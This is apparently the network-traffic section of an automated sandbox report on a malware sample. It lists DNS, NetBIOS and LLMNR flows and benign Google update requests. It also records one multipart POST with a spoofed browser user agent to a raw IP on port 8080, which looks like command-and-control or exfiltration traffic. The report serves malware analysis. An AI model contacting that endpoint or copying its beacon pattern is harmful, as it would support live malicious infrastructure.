192.168.56.101 57367 114.114.114.114 53
192.168.56.101 58070 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60215 114.114.114.114 53
192.168.56.101 60911 114.114.114.114 53
192.168.56.101 62191 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 53210 224.0.0.252 5355
192.168.56.101 53500 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 54260 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://37.139.21.175:8080/j0V7918dVGr/1ZnCAPwRCvZBO8GR4I/ 
POST /j0V7918dVGr/1ZnCAPwRCvZBO8GR4I/ HTTP/1.1
Referer: http://37.139.21.175/j0V7918dVGr/1ZnCAPwRCvZBO8GR4I/
Content-Type: multipart/form-data; boundary=---------------------------987467103341571
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 37.139.21.175:8080
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=d87c982ac53262f7&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619473948&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=d87c982ac53262f7&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619473948&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619473948&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619473948&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.